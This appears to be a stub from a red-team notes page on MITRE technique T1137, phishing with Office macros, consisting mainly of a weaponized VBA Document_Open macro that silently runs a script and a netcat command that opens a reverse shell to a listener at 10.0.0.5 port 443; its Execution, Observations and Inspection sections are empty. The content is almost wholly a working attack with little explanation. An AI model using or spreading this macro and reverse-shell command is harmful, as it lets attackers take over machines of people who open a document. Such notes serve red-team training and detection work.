T1137: Phishing - Office Macros
Code execution with VBA Macros
Weaponization
Private Sub Document_Open()
MsgBox "game over", vbOKOnly, "game over"
a = Shell("C:\tools\shell.cmd", vbHide)
End SubC:\tools\nc.exe 10.0.0.5 443 -e C:\Windows\System32\cmd.exe


Execution


Observations

Inspection




References
Last updated